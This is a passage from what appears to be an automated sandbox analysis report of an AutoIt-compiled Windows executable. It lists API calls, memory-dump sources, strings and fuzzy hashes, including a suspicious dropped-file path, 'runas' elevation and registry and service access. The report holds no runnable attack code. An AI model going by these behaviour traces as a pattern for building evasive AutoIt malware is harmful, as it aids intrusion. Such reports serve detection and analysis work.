            • Part of subcall function 01140350: ShowWindow.USER32(?,00000000), ref: 011403CE
            • Part of subcall function 0113E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0113E3A7
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
          • String ID: AutoIt$C:\Users\user\77066510\txoxpdjc.qnr$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
          • API String ID: 1688597619-2627081920
          • Opcode ID: 918f05b159d7baf3cae95fc93358b86d43a4667456565d552277153fa79bd41c
          • Instruction ID: 8637bf4523c7cf1ea08b13dd74f9f6a6262f69d607a1cf1025e0464b0238439f
          • Opcode Fuzzy Hash: 918f05b159d7baf3cae95fc93358b86d43a4667456565d552277153fa79bd41c
          • Instruction Fuzzy Hash: 06414D70A06204AFDB3CB7E4E884BED7B789B98718F4041D4E66553289CB7069C8C722
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryA.KERNELBASE(uxtheme.dll,0113EE15,0113D92E), ref: 0113EE3B
          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0113EE4D
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: IsThemeActive$uxtheme.dll
          • API String ID: 2574300362-3542929980
          • Opcode ID: b154503ca2d56e818258f367dbdcd4ac370cbef1535787cb7d862b768acdd4e9
          • Instruction ID: 27704746e80a9caa31c24c358165cbd0b5050a8c5226c72e90c7b089cff88a34
          • Opcode Fuzzy Hash: b154503ca2d56e818258f367dbdcd4ac370cbef1535787cb7d862b768acdd4e9
          • Instruction Fuzzy Hash: C8D0C9B4906727DAEB380F26C4897067BE4AB44A42F20883CE6A291559EB74D084CB34
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetFileAttributesW.KERNELBASE(?,00000000), ref: 011639AC
          • FindFirstFileW.KERNELBASE(?,?), ref: 011639BD
          • FindClose.KERNEL32(00000000), ref: 011639D0
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: FileFind$AttributesCloseFirst
          • String ID:
          • API String ID: 48322524-0
          • Opcode ID: 93815275a25e4e6cf56cc64e2af27138e99a8b92690c6be399ca99c148b04c49
          • Instruction ID: 85638d0608c5799a7c193459a473f52d5208c5090ad2ede9e3828551db57c3ee
          • Opcode Fuzzy Hash: 93815275a25e4e6cf56cc64e2af27138e99a8b92690c6be399ca99c148b04c49
          • Instruction Fuzzy Hash: 2DE092368145149B8624BA7CAC494E9779CDB06375F000752FE38C21C0E731A9E44BD6
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F12E), ref: 0114F175
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: __wcsnicmp
          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
          • API String ID: 1038674560-3360698832
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: Message$Peek$DispatchSleepTranslate
          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
          • API String ID: 1762048999-758534266
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119AC5C
          • RegCreateKeyExW.KERNELBASE(?,?,00000000,011B4E64,00000000,?,00000000,?,?,?), ref: 0119ACB6
          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0119AD00
          Strings
          Similarity
          • API ID: CloseConnectCreateRegistry
          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
          • API String ID: 3217815495-966354055
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _wcsncpy.LIBCMT ref: 0118CE26
          • __wsplitpath.LIBCMT ref: 0118CE65
          • _wcscat.LIBCMT ref: 0118CE78
          • _wcscat.LIBCMT ref: 0118CE8B
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CE9F
          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000104,?), ref: 0118CEB2
            • Part of subcall function 0116397D: GetFileAttributesW.KERNELBASE(?), ref: 01163984
          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CEF2
          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF0A
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF1B
          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF2C
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF40
          • _wcscpy.LIBCMT ref: 0118CF4E
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF91
          Strings
          Similarity
          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
          • String ID: *.*
          • API String ID: 1153243558-438819550
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0113E5FF
          • __wsplitpath.LIBCMT ref: 0113E61C
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcsncat.LIBCMT ref: 0113E633
          • __wmakepath.LIBCMT ref: 0113E64F
            • Part of subcall function 011439BE: __wmakepath_s.LIBCMT ref: 011439D4
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • _wcscpy.LIBCMT ref: 0113E687
            • Part of subcall function 0113E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0113E6A1), ref: 0113E6DD
          • _wcscat.LIBCMT ref: 01157324
          • _wcslen.LIBCMT ref: 01157334
          • _wcslen.LIBCMT ref: 01157345
          • _wcscat.LIBCMT ref: 0115735F
          • _wcsncpy.LIBCMT ref: 0115739F
          Strings
          Similarity
          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
          • String ID: Include$\
          • API String ID: 3173733714-3429789819
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetSysColorBrush.USER32(0000000F), ref: 01140513
          • RegisterClassExW.USER32 ref: 0114053D
          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0114054E
          • InitCommonControlsEx.COMCTL32(011D90E8), ref: 0114056B
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0114057B
          • LoadIconW.USER32 ref: 01140592
          • ImageList_ReplaceIcon.COMCTL32(0196FF38,000000FF,00000000), ref: 011405A2
          Strings
          Similarity
          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
          • API String ID: 2914291525-1005189915
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetSysColorBrush.USER32(0000000F), ref: 011403EB
          • LoadCursorW.USER32(00000000,00007F00), ref: 011403FA
          • LoadIconW.USER32 ref: 01140410
          • LoadIconW.USER32 ref: 01140423
          • LoadIconW.USER32 ref: 01140436
          • LoadImageW.USER32 ref: 0114045E
          • RegisterClassExW.USER32 ref: 011404AD
            • Part of subcall function 011404E0: GetSysColorBrush.USER32(0000000F), ref: 01140513
            • Part of subcall function 011404E0: RegisterClassExW.USER32 ref: 0114053D
            • Part of subcall function 011404E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0114054E
            • Part of subcall function 011404E0: InitCommonControlsEx.COMCTL32(011D90E8), ref: 0114056B
            • Part of subcall function 011404E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0114057B
            • Part of subcall function 011404E0: LoadIconW.USER32 ref: 01140592
            • Part of subcall function 011404E0: ImageList_ReplaceIcon.COMCTL32(0196FF38,000000FF,00000000), ref: 011405A2
          Strings
          Similarity
          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
          • String ID: #$0$AutoIt v3
          • API String ID: 423443420-4155596026
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Similarity
          • API ID: _malloc
          • String ID: Default
          • API String ID: 1579825452-753088835
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: __fread_nolock_fseek_memmove_strcat
          • String ID: AU3!$EA06
          • API String ID: 1268643489-2658333250
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • DefWindowProcW.USER32(?,?,?,?), ref: 01131376
          • KillTimer.USER32(?,00000001), ref: 011313F9
            • Part of subcall function 01131240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0113129B
          • PostQuitMessage.USER32(00000000), ref: 0113140B
          Strings
          Similarity
          • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
          • String ID: TaskbarCreated
          • API String ID: 3067442764-2362178303
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01163229: _wcsncpy.LIBCMT ref: 01163241
          • _wcslen.LIBCMT ref: 011635D7
          • GetFileAttributesW.KERNELBASE(?), ref: 01163601
          • GetLastError.KERNEL32 ref: 01163610
          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01163624
          • _wcsrchr.LIBCMT ref: 0116364B
            • Part of subcall function 011635B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0116368C
          Strings
          Similarity
          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
          • String ID: \
          • API String ID: 321622961-2967466578
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: _memmove$_malloc
          • String ID:
          • API String ID: 1938898002-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119A90F
          Similarity
          • API ID: ConnectRegistry_memmove_wcslen
          • String ID:
          • API String ID: 15295421-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetVersionExW.KERNEL32(?), ref: 0113E72A
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • GetCurrentProcess.KERNEL32(?), ref: 0113E7D4
          • GetNativeSystemInfo.KERNELBASE(?), ref: 0113E832
          • FreeLibrary.KERNEL32(?), ref: 0113E842
          • FreeLibrary.KERNEL32(?), ref: 0113E854
          Similarity
          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
          • String ID:
          • API String ID: 3363477735-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SHGetMalloc.SHELL32(0113F1FC), ref: 0113F3BD
          • SHGetDesktopFolder.SHELL32(?,011D90E8), ref: 0113F3D2
          • _wcsncpy.LIBCMT ref: 0113F3ED
          • SHGetPathFromIDListW.SHELL32(?,?), ref: 0113F427
          • _wcsncpy.LIBCMT ref: 0113F440
          Strings
          Similarity
          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3170942423-3700514364
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01131E00: _wcsncpy.LIBCMT ref: 01131ED2
            • Part of subcall function 01131E00: _wcscpy.LIBCMT ref: 01131EF1
            • Part of subcall function 01131E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 01131F03
          • KillTimer.USER32(?,?,?,?,?), ref: 01131513
          • SetTimer.USER32 ref: 01131522
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157BC8
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157C1C
          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 01157C67
          Similarity
          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
          • String ID:
          • API String ID: 3300667738-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0113E6A1), ref: 0113E6DD
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0113E6A1,00000000,?,?,?,0113E6A1), ref: 01157117
          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0113E6A1,?,00000000,?,?,?,?,0113E6A1), ref: 0115715E
          • RegCloseKey.ADVAPI32(?,?,?,?,0113E6A1), ref: 0115718F
          Strings
          Similarity
          • API ID: QueryValue$CloseOpen
          • String ID: Include$Software\AutoIt v3\AutoIt
          • API String ID: 1586453840-614718249
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateWindowExW.USER32 ref: 01140385
          • CreateWindowExW.USER32 ref: 011403AE
          • ShowWindow.USER32(?,00000000), ref: 011403C4
          • ShowWindow.USER32(?,00000000), ref: 011403CE
          Strings
          Similarity
          • API ID: Window$CreateShow
          • String ID: AutoIt v3$edit
          • API String ID: 1584632944-3779509399
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: _malloc_wcslen$_strcat_wcscpy
          • String ID:
          • API String ID: 1612042205-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,011D90E8,14000000,0115E1BD), ref: 01162FDD
          • LockServiceDatabase.ADVAPI32(00000000), ref: 01162FEA
          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 01162FF5
          • CloseServiceHandle.ADVAPI32(00000000), ref: 01162FFE
          • GetLastError.KERNEL32 ref: 01163009
          • CloseServiceHandle.ADVAPI32(00000000), ref: 01163019
          Similarity
          • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
          • String ID:
          • API String ID: 1690418490-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 011406F7
          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0114071E
          • RegCloseKey.KERNELBASE(?), ref: 01140745
          • RegCloseKey.ADVAPI32(?), ref: 01140759
          Strings
          Similarity
          • API ID: Close$OpenQueryValue
          • String ID: Control Panel\Mouse
          • API String ID: 1607946009-824357125
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          Similarity
          • API ID: __fread_nolock_fseek_memmove_strcat
          • String ID: AU3!
          • API String ID: 1268643489-3499719025
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RegEnumKeyExW.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,?), ref: 01171C30
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01171C64
          • RegCloseKey.ADVAPI32(?), ref: 01171C85
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 01171CC7
          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01171CF5
          Similarity
          • API ID: Enum$CloseDeleteOpen
          • String ID:
          • API String ID: 2095303065-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0113FE20: _wcslen.LIBCMT ref: 0113FE35
            • Part of subcall function 0113FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,011843ED,?,00000000,?,?), ref: 0113FE4E
            • Part of subcall function 0113FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0113FE77
          • _strcat.LIBCMT ref: 0113F4B6
            • Part of subcall function 0113F540: _strlen.LIBCMT ref: 0113F548
            • Part of subcall function 0113F540: _sprintf.LIBCMT ref: 0113F69E
          Strings
          Similarity
          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr$?T
          • API String ID: 3199840319-1321256506
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetEnvironmentStringsW.KERNEL32(00000000,01146433), ref: 0114F4A7
          • __malloc_crt.LIBCMT ref: 0114F4D6
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0114F4E3
          Similarity
          • API ID: EnvironmentStrings$Free__malloc_crt
          • String ID:
          • API String ID: 237123855-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011434DB: __FF_MSGBANNER.LIBCMT ref: 011434F4
            • Part of subcall function 011434DB: __NMSG_WRITE.LIBCMT ref: 011434FB
            • Part of subcall function 011434DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01146A35,?,00000001,?,?,01148179,00000018,011BD180,0000000C,01148209), ref: 01143520
          • std::exception::exception.LIBCMT ref: 01141546
          • std::exception::exception.LIBCMT ref: 01141560
          • __CxxThrowException@8.LIBCMT ref: 01141571
          Similarity
          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
          • String ID:
          • API String ID: 615853336-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 01131D57
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          Strings
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
          • String ID: @EXITCODE
          • API String ID: 2734553683-3436989551
          Uniqueness

          Uniqueness Score: -1.00%

          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          Similarity
          • API ID: __wcsicoll
          • String ID:
          • API String ID: 3832890014-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • VariantInit.OLEAUT32(00000000), ref: 0115A95F
          • VariantCopy.OLEAUT32(?,?), ref: 0115A969
          • VariantClear.OLEAUT32(00000000), ref: 0115A97A
          Similarity
          • API ID: Variant$ClearCopyInit_malloc
          • String ID:
          • API String ID: 2981388473-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 01139FE6
          • VariantInit.OLEAUT32(00000000), ref: 01159B15
          • VariantCopy.OLEAUT32(?,?), ref: 01159B23
          • VariantClear.OLEAUT32(00000000), ref: 01159B34
          Similarity
          • API ID: Variant$ClearCopyInit_malloc_memmove
          • String ID:
          • API String ID: 441919481-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: __filbuf__getptd_noexit__read_memcpy_s
          • String ID:
          • API String ID: 1794320848-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Similarity
          • API ID: _wcslen
          • String ID:
          • API String ID: 176396367-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 011A5381
          • TerminateProcess.KERNEL32(00000000), ref: 011A5388
          Similarity
          • API ID: Process$CurrentTerminate
          • String ID:
          • API String ID: 2429186680-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _strlen.LIBCMT ref: 01162991
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,01184515,00000000,00000000,?,?,?,01184515,?,000000FF), ref: 011629A6
          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,01184515,00000000,00000000,000000FF), ref: 011629E5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharMultiWide$_strlen
          • String ID:
          • API String ID: 1433632580-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _wcslen.LIBCMT ref: 0113FE35
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,011843ED,?,00000000,?,?), ref: 0113FE4E
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0113FE77
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharMultiWide$_wcslen
          • String ID:
          • API String ID: 2761822629-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: Message$DispatchPeekTranslate
          • String ID:
          • API String ID: 4217535847-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0113F490: _strcat.LIBCMT ref: 0113F4B6
          • _free.LIBCMT ref: 01159524
            • Part of subcall function 011335F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 01133681
            • Part of subcall function 011335F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 01133697
            • Part of subcall function 011335F0: __wsplitpath.LIBCMT ref: 011336C2
            • Part of subcall function 011335F0: _wcscpy.LIBCMT ref: 011336D7
            • Part of subcall function 011335F0: _wcscat.LIBCMT ref: 011336EC
            • Part of subcall function 011335F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 011336FC
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr
          • API String ID: 3938964917-3700514364
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0115959F
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
            • Part of subcall function 0113F3B0: SHGetMalloc.SHELL32(0113F1FC), ref: 0113F3BD
            • Part of subcall function 0113F3B0: SHGetDesktopFolder.SHELL32(?,011D90E8), ref: 0113F3D2
            • Part of subcall function 0113F3B0: _wcsncpy.LIBCMT ref: 0113F3ED
            • Part of subcall function 0113F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 0113F427
            • Part of subcall function 0113F3B0: _wcsncpy.LIBCMT ref: 0113F440
            • Part of subcall function 0113F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0113F2AB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
          • String ID: X
          • API String ID: 85490731-3081909835
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc
